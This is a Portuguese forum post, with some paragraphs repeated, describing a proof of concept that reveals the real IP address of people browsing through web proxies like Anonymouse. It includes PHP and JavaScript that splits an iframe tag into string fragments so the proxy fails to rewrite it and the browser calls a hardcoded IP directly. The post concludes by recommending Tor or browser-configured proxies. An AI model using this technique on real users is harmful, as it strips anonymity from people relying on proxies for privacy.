Tweet
Já faz algum tempo que ando pesquisando a respeito de anonimidade na internet. Encontrei vários sistemas de WebProxy, inclusive já disponibilizei um aberto exclusivo (mas não filiado) ao GH, que por problemas na hospedagem, acabou saindo do ar.
Porém, é sobre eles que pretendo falar. Eles funcionam basicamente assim:
É feita uma lista de tags que fazem conexão com outros arquivos (imagens, folhas de estilo, scripts etc), como por exemplo:
A partir daí, o script transforma todos os endereços externos na página em endereços que passam primeiramente ao sistema do WebProxy, de forma a tentar garantir a anonimidade. Mas não foi bem assim que funcionou.
Em prova: os sistemas de WebProxy. Neste caso, estou usando oApenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
O código:
A lógica: Já que os sistemas de webproxy buscam por tags HTML inteiras, utilizando um pouco de JavaScript, partiremos uma tag em pedaços. O navegador será capaz de remontá-la, mas o webproxy, não.
O procedimento: Joguei este arquivo em meu servidor local. Primeiramente, entrei no meuip.com.br e obtive o IP do proxy. Em seguida, obtive meu IP verdadeiro, entrei no Anonymouse e acessei o arquivo.
Previsão: Aparecerá duas linhas. Na primeira, ter-se-á o IP do webproxy, obtido diretamente. Já na segunda, constará seu verdadeiro IP, burlando o webproxy.
Resultado: Como previsto, acima apareceu o IP que eu havia pego no MeuIP (do proxy) e, abaixo, apareceu o meu verdadeiro IP.
Solução: Há como fazer filtragem do script, para que isto não seja possível, mas com certeza ninguém sairá por todas as páginas de webproxies disponibilizando a solução aos desenvolvedores. Neste caso, sugiro a utilização de proxies diretos (configurados no navegador) ou softwares como Tor ou Jap, já que este tipo de conexão não depende de modificações no código-fonte das páginas visitadas, afinal, toda conexão é feita somente através do proxy configurado.
Até mais!
Porém, é sobre eles que pretendo falar. Eles funcionam basicamente assim:
É feita uma lista de tags que fazem conexão com outros arquivos (imagens, folhas de estilo, scripts etc), como por exemplo:
Código:
<img> <script> <a>
Em prova: os sistemas de WebProxy. Neste caso, estou usando oApenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
O código:
Código PHP:
<?php
// Proof of concept by 0KaL
if(isset($_GET['ip'])) {
die($_SERVER['REMOTE_ADDR']);
}
?>
<!DOCTYPE html>
<html>
<head>
<title>PoC anti webproxies</title>
</head>
<body>
<?php echo $_SERVER['REMOTE_ADDR']; ?>
<br>
<script>
document.write("<ifram"+"e s"+"rc"+"='http://187"+".1"+"18."+"87."+"179"+"/te"+"st."+"php?"+"ip'"+" frameborder='0'></"+"if"+"ram"+"e>");
</script>
</body>
</html>
O procedimento: Joguei este arquivo em meu servidor local. Primeiramente, entrei no meuip.com.br e obtive o IP do proxy. Em seguida, obtive meu IP verdadeiro, entrei no Anonymouse e acessei o arquivo.
Previsão: Aparecerá duas linhas. Na primeira, ter-se-á o IP do webproxy, obtido diretamente. Já na segunda, constará seu verdadeiro IP, burlando o webproxy.
Resultado: Como previsto, acima apareceu o IP que eu havia pego no MeuIP (do proxy) e, abaixo, apareceu o meu verdadeiro IP.
Solução: Há como fazer filtragem do script, para que isto não seja possível, mas com certeza ninguém sairá por todas as páginas de webproxies disponibilizando a solução aos desenvolvedores. Neste caso, sugiro a utilização de proxies diretos (configurados no navegador) ou softwares como Tor ou Jap, já que este tipo de conexão não depende de modificações no código-fonte das páginas visitadas, afinal, toda conexão é feita somente através do proxy configurado.
Até mais!
